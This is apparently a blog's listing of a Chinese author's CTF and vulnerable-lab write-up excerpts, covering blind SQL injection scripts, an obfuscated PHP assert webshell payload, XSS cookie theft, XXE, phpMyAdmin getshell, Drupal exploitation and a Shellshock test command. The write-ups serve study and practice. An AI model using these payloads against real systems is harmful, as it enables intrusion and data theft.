- 博客(51)
- 收藏
- 关注
RSS订阅原创 [GYCTF2020]Ezsqli(无列名注入)
[GYCTF2020]Ezsqli过滤了好多东西,包括用来查询的information关键词,本上就是考虑盲注了当||后面条件为真时返回Nu1L,为假时返回V&N,这就是判断盲注语句是否成立的关键接下来就可以写脚本判断表名了import requestsurl = 'http://bfd71058-3cf0-4e87-8731-8935a651f051.node3.buuoj.cn/'payload = '2||ascii(substr((select group_concat
2020-05-16 21:22:40
4986
2
原创 [极客大挑战 2019]RCE ME
代码执行,过滤了字母数字,用异或或取反都可以code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo发现过滤了大部分命令执行的函数,下面考虑如何绕过,有两种方法①蚁剑插件首先构造一个木马code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=e...
2020-04-02 22:12:29
1200
1
原创 [网鼎杯 2018]Comment
首先爆破弱密码登录,是一个类似留言板的界面,考虑二次注入git源码泄露这里要恢复一下文件,否则文件内容显示不全//write_do.php<?phpinclude "mysql.php";session_start();if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(...
2020-03-26 20:50:15
4350
原创 [网鼎杯 2018]Fakebook
robots.txt泄露源码//user.php.bak<?phpclass UserInfo{ public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->...
2020-03-25 00:12:13
4851
原创 [De1CTF 2019]SSRF Me
#! /usr/bin/env python#encoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding(...
2020-03-19 20:23:02
484
原创 [CISCN2019 华东北赛区]Web2
注册登录后,观察这两个页面联想到存储型xss盗取cookie,下面我们要做的就是触发xss代码经过测试这里要用HTML Markup转码in_str = "eval(alert(/xss/))"list = ""for tr in in_str: list += "&#" + str(ord(tr))print(list)<svg><scri...
2020-03-18 22:19:07
389
原创 [CISCN2019 华北赛区 Day1 Web5]CyberPunk
查看源码可能有用伪协议读取源码利用此方法依次读取到delete.php,confirm.php,change.php,search.php,不一一展示了,直接看存在漏洞的confirm.php和change.php//confirm.php<?phprequire_once "config.php";//var_dump($_POST);if(!empty($_POST...
2020-03-18 00:51:34
1004
原创 [CISCN2019 总决赛 Day2 Web1]Easyweb 1
文件泄露通过观察源代码(反正就是这几个php文件嘛,一个个试就行了)//image.php.bak<?phpinclude "config.php";$id=isset($_GET["id"])?$_GET["id"]:"1";$path=isset($_GET["path"])?$_GET["path"]:"";$id=addslashes($id);$path=a...
2020-03-17 01:12:27
1328
原创 [CISCN2019 华北赛区 Day1 Web2]ikun 1
写一个python脚本import requestsurl = 'http://c8f78f51-2593-4b2a-8e72-f39543bc99dd.node3.buuoj.cn/shop?page={}'for i in range(1000): r = requests.get(url.format(str(i))) if 'lv6.png' in r.text:...
2020-03-16 21:52:53
557
1
转载 Http Cookie机制及Cookie的实现原理
文章参考https://www.cnblogs.com/limengyao/p/8604379.html文章参考https://www.cnblogs.com/limengyao/p/8604379.html文章参考https://www.cnblogs.com/limengyao/p/8604379.htmlCookie是进行网站用户身份,实现服务端Session会话持久化的一种非常好方...
2020-03-07 13:05:49
197
原创 XSS-games
关于xss的概念什么的,这里就不赘述了在本地搭建了一个xss靶机,都复现一遍level1<!DOCTYPE html><!--STATUS OK--><html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><script&...
2020-03-05 11:37:42
292
原创 XXE总结
XXE什么是XXE简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。我们在本地测试xxehttps://github.com/c0ny1/...
2020-03-03 18:35:52
230
原创 靶机xxe
靶机主要考察的就是xxe,过程很简单,而且没有涉及提权,就走一遍流程,后面重点总结访问admin.php显示404,访问xxe目录发现了xml,直接xxe攻击直接读取passwd的信息,下面以同样方法读取admin.php解密出来登录不了,原来xxe目录下也存在这一个admin.php将得到的字符串先base32解密base64解密得到一个路径解密后是一个利用自增...
2020-03-03 18:35:13
155
原创 “百度杯”CTF比赛 十二月场 Blog·进阶篇
利用上一篇blog的思路,用admin/19-10-1997得到管理页面这里用php伪协议读取是不行的,php://filter已经失效了,这里的文件包含仍然能够执行,这里是我们可以利用的这里的思路是上传一个shell,用命令执行读取shell,上传点也不好找,这里利用的是一个php文件上传的特性这里利用了php对POST上传文件临时保存的特性php对post过来的文件有一个默认处理流程...
2020-03-02 11:55:21
910
原创 “百度杯”CTF比赛 十二月场 Blog
进去注册登录,找到post界面类似一个编辑器的东西,上传一个图片报错并且提示这是kindeditor编辑器关于kindeditor编辑器的一个遍历漏洞,涉及代码审计,暂且不考虑原理https://www.jb51.net/hack/367946.html发现了flag.php,访问并没有可用信息这道题其实是一个insert注入,就在留言板界面那里这是一个类似insert i...
2020-03-01 00:29:03
772
1
原创 无字母数字的webshell
构造无数字字母的webshell1.异或可以看到将A和?进行异或可以得到~异或的过程就是将字符转化为ascii,再变为二进制进行异或这里就是将"A"的Ascii码的二进制与"?"的Ascii码的二进制进行异或得到一个新的二进制,在变为Ascii码,最后在变为字符,也就是~首先我们实现构造assert($_POST[_]);<?phpfor ($i=0; $i < 256...
2020-02-29 22:22:37
1665
原创 利用phpmyadmin getshell(非实战,在本地环境下进行)
1.利用phpmyadmin查看数据库用户账号密码(这里我的phpmyadmin总是报错,就用Mysql-Font代替了,都是一样的)①查看当前用户权限②查询数据库路径③查询mysql路径一般user.MYD文件存储在\data\mysql\user.MYD下,在本地查看user.MYD发现都是乱码,我们的目的是得到root密码实现提权,接下来就是得到root的哈希值④依次执行以...
2020-02-27 01:32:12
419
原创 [强网杯 2019]随便注+CISCN2019 Hack World
这道题考察的是堆叠注入,order by判断出有两个字段这里也过滤了一些关键词看到有两个表,flag字段在那个纯数字的表里,但是无法查询得到words有两列,id和data(一会第一种方法要用到)1';show columns from `1919810931114514`;#这里的反引号用来表示表名,这里必须加上,但是words表不用加,这里猜测和表的数据类型有关,纯数字型的要加...
2020-02-24 14:33:28
295
原创 eval,system,exec,shell_exec的解释
(所有函数都在windows环境下运行,linux暂不考虑)一.eval执行php代码(不执行系统命令,比较常见的就是一句话木马)二.system执行系统命令(cat,ls,ping这些),不能代码执行<?phpsystem("dir");echo "</br>";?>三.exec<?phpecho exec(dir);echo "&l...
2020-02-22 16:33:52
892
原创 [CISCN 2019 初赛]Love Math
<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { ...
2020-02-19 17:44:33
2041
原创 [RoarCTF 2019]Simple Upload
<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller{ public function index() { show_source(__FILE__); } public function uploa...
2020-01-19 23:49:18
2849
原创 [SWPU2019]Web1
这是一个留言板的二次注入当时自己用的是报错注入,结果并没有做出来,看其他人的wp用的是union注入,并且有22个字段
2020-01-15 23:25:42
2945
原创 [SUCTF 2019]CheckIn
一看是文件上传,限制了后缀,不能上传.htaccess,检查了文件内容,不过我们可以添加GIF89a来伪造一个文件头这里利用到了.user.ini编辑.use.ini的内容,pc_ma.jpg是事先准备好的一句话木马发现过滤了<?,这里我们进行变形发现还是不行,然后尝试了一个普通的jpg文件,发现也是不行,猜测这里可能是进行了文件头的检测,加一个GIF89a(.user.in...
2020-01-05 16:31:12
1645
原创 靶机Homeless
kali : 192.168.230.236靶机 : 192.168.230.245打开web网页,查看源码,发现了user-agent信息,后经过测试,抓包后修改user-agent信息会回显,考虑如何利用它还是看源码信息,这里有一个位置的图片,访问一下如果不是看别人的wp,给我一万年也做不出来我们需要在agaent字段填上这个图片的字段 “Cyberdog Sleddin...
2020-01-03 19:25:32
429
原创 [SUCTF 2019]EasyWeb
<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($u...
2020-01-01 19:14:33
637
原创 php伪协议的应用
以下都在本地测试运行在测试之前,先修改一下php.ini里面的配置文件1.(input输出流)index.php文件内容为<?php include($_GET["file"]); ?>php://input 是个可以访问请求的原始数据的只读流,关于php://inputhttps://www.cnblogs.com/redfire/p/7695263.html...
2019-12-26 00:09:57
427
原创 靶机CH4INRULZ_v1.0.1
kali : 192.168.230.236靶机 : 192.168.230.238与之前的靶机不同,这次有ftp和8011,先登陆ftp看看发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说)接着看看80没有什么发现找不到可入手的地方(80网页先暂时放一放)一开始有一个8011端口,我们访问一下访问之...
2019-12-12 00:52:00
488
原创 [HCTF 2018]admin
这道题先用flask session伪造来做flask session伪造过程就是先创建一个普通用户(知道session),解密,把name换成admin(前提也是admin作为管理员账户),在加密,通过admin的session登陆进去,就能直接实现对admin的控制首先创建一个test用户,如图为它的session将session解密#!/usr/bin/env python3im...
2019-12-09 15:39:08
775
原创 靶机DC-7
kali : 192.168.230.233靶机 : 192.168.230.235扫了目录,查看了robots.txt,登陆框也看了一下注入,并没有发现啥,注意到下面的@DC7USER,google一下,发现了源码,拷贝下来打开其中的config.php,发现了一个账号密码,ssh上去直接登录成功先进入了一个目录,查看文件后发现都是乱码把目标放在mbox上关注到邮件的Subj...
2019-12-09 00:49:41
297
原创 靶机Fristileaks
靶机 : 192.168.230.232kali : 12.168.230.226nmap扫描只扫到一个80,直接看网页就好了扫目录啥都没发现,页面信息搜集,存在fristi/目录,感觉没有啥东西,真实情况下怎么可能存在这个情况存在一个登录页面,查看一下源代码这应该是作者给的提示信息放到kali里面发现是一个png格式的图片,我们把它还原解出密码发现一个上传页面,...
2019-11-28 21:45:20
175
原创 靶机DC-6
靶机 :192.168.230.231 kali : 192.168.230.226一开始扫描到80和22访问80,发现是wordpress,用wpscan扫出用户,根据作者的提示,得到密码字典,爆破记一下这个linux命令爆破出用户是mark,密码是helpdesk01,wordpress登录其他wp上讲的是用msf会搜到一个关于activity monitor的ssrf漏洞,但...
2019-11-27 00:23:30
1155
原创 靶机DC-4
kali : 192.168.230.226靶机 :192.168.230.229开放了web和ssh,还是从web入手有个登陆页面,这里试了几个弱口令,不能登,看Wp说是爆破一下密码是happy,这里就跳过了(真实情况下哪有这么容易就登陆,主要是积累一下提权方式吧)发现有可以执行命令的地方,这就想到了反弹一个shell,前面有一个Acid靶机也是这样做的,不过这个靶机是用的netc...
2019-11-21 21:04:23
425
原创 靶机DC-2
目标靶机 : 192.168.230.228kali : 192.168.230.226发现是wordpress,考虑wpscan点击flag,根据提示,需要用到cewl简单的讲,这个工具是利用页面爬取深度生成字典的一个工具wpscan -u http://dc-2 -eu -et -ep利用wpscan扫一下用户名(一开始我以为用户名和密码都能扫出来,-ep还以为是passwo...
2019-11-18 13:16:04
204
原创 靶机DC-1
首先还是从80端口入手,访问一下网页查阅资料Drupal存在漏洞,用msf扫一下我们选择最新的漏洞测试一下返回了一个shell,漏洞利用成功生成虚拟终端根据cms特性,找到配置文件 /var/www/sites/default/settings.php,接下来连接mysql数据库发现了admin的账号密码,拿到somd5解密,发现不能解,这里还是利用cms特性,scrip...
2019-11-14 18:11:04
151
原创 靶机Raven
大致看了看别人的wp,感觉这个靶机坐下来还是能获得不少东西的大致分为两种方法,先来第一种比较简单的,第二种可能需要较长时间消化kali : 192.168.230.224target : 192.168.230.225第一种方法(扫描->发现web服务->得知wordpress服务->wpscan扫描->发现用户名密码->用hydra爆破ssh(这里直接试出来...
2019-11-10 16:15:15
1105
2
原创 靶机FourAndSix2
kali : 192.168.230.224靶机: 192.168.230.215发现并没有web服务,但是开放了nfs服务nfs服务主要功能是通过网络让不同的机器系统之间可以彼此共享文件和目录。NFS服务器可以允许NFS客户端将远端NFS服务器端的共享目录挂载到本地的NFS客户端中。NFS是Network File System的缩写,即网络文件系统。一种使用于分散式文件系统的协定,...
2019-11-06 15:14:19
266
原创 [BUUCTF 2018]Online Tool
代码审计HTTP_X_FORWARDED_FOR获得客户端的ip地址对于escapeshellarg这是在本地的一个运行结果escapeshellcmd — shell 元字符转义功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。 此函数保证用户输入的数据在传送到 exec() 或 system() 函数,或者 执行操作符 之...
2019-11-04 23:55:06
150
原创 web
i春秋(VID)首先查看源码,提示访问index.php.txt,得到一些代码,这里简单整理一下Finding entry pointsBranch analysis from position: 0Jump found. Position 1 = 23, Position 2 = 38Branch analysis from position: 23Jump found. Posit...
2019-10-14 17:01:32
205
原创 漏洞利用(msf的使用)
1.利用数据库(查询快捷)2.切换数据库模式3.创建一个新的用户(这里设置用户名与密码都是qqq)4.创建一个数据库–owner指定刚才创建的用户,最后一个参数指定数据库名字qqq(接下来开始使用工具)这是msf工具的一些信息连接数据库的步骤5.建立一个工作台(执行命令)大概的使用步骤就是这样,里面有很多漏洞利用模块,之后的漏洞利用都借助这个工具...
2019-09-25 19:49:31
957
原创 墨者学院中的一些漏洞复现
Bash漏洞分析溯源bash漏洞本质上是一个任意代码执行漏洞,是存在于linux命令行下的一种输出漏洞env x='() { :;}; echo vulnerable' bash -c "echo this is a test若存在该漏洞,正常情况下会输出(版本号小于bash 4.3的linux或者unix系统上执行以上命令)vulnerablethis is a test这里只是...
2019-09-15 13:02:19
611
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人